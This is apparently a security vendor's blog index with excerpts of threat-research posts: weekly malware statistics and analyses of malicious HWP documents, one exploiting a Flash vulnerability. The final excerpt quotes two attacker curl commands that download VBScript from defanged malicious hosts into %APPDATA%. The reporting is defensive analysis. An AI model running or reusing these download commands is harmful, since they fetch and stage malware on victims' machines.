ASEC Weekly Malware Statistics (August 29th, 2022 – September 4th, 2022)
Posted By jcleebobgatenet, September 14, 2022
The ASEC analysis team is using the ASEC automatic analysis system RAPIT to categorize and respond to known malware. This post will list weekly statistics collected from August 29th, 2022 (Monday) to September 4th, 2022 (Sunday). For the main category, info-stealer ranked top with 45.9%, followed by downloader with 28.1%, backdoor with 18.5%, ransomware with 6.2%, and CoinMiner and banking malware with 0.7% each. Top 1 – GuLoader: GuLoader, which ranked first place with 22.6%, is a downloader malware that…
HWP File Disguised as Personal Profile Form (OLE Object)
Posted By minakg1217, September 5, 2022
The ASEC analysis team has recently identified a malicious HWP file that exploits OLE objects and a Flash vulnerability. The file uses a malicious URL identified in 2020. This URL hosts a file exploiting the Flash vulnerability CVE-2018-15982, so users should take caution. The identified HWP file includes OLE objects, and the corresponding files are generated in the %TEMP% folder when the HWP file is opened. The created files are shown below. The HWP file does not directly use previously known files…
ASEC Weekly Malware Statistics (August 22nd, 2022 – August 28th, 2022)
Posted By jcleebobgatenet, September 1, 2022
The ASEC analysis team is using the ASEC automatic analysis system RAPIT to categorize and respond to known malware. This post will list weekly statistics collected from August 22nd, 2022 (Monday) to August 28th, 2022 (Sunday). For the main category, info-stealer ranked top with 41.0%, followed by backdoor with 31.8%, downloader with 21.4%, and ransomware with 5.8%. Top 1 – Agent Tesla: Agent Tesla is an info-stealer that ranked first place with 23.7%. It is an info-stealer that leaks user credentials…
ASEC Weekly Malware Statistics (August 15th, 2022 – August 21st, 2022)
Posted By jcleebobgatenet, September 1, 2022
The ASEC analysis team is using the ASEC automatic analysis system RAPIT to categorize and respond to known malware. This post will list weekly statistics collected from August 15th, 2022 (Monday) to August 21st, 2022 (Sunday). For the main category, info-stealer ranked top with 57.8%, followed by backdoor with 24.2%, downloader with 13.7%, ransomware with 3.7%, and CoinMiner with 0.6%. Top 1 – Agent Tesla: Agent Tesla is an info-stealer that ranked first place with 38.5%. It is an info-stealer that leaks…
Malicious HWP File Disguised as a Happy Birthday Message (OLE Object)
Posted By jcleebobgatenet, September 1, 2022
The ASEC analysis team has recently discovered a VBScript that downloads a malicious HWP file. The distribution path of the malware is yet to be determined, but the VBScript is downloaded through curl. The commands discovered so far are as follows:
curl -H "user-agent: chrome/103.0.5060.134 safari/537.32" hxxp://datkka.atwebpages[.]com/2vbs -o %appdata%\vbtemp
cmd /c cd > %appdata%\tmp~pth && curl hxxps://datarium.epizy[.]com/2vbs -o %appdata%\vbtemp
Both commands save the script in the %APPDATA% folder as vbtemp. As shown below, hxxp://datkka.atwebpages[.]com/2vbs contains VBScript code that performs features such as registering a scheduled task…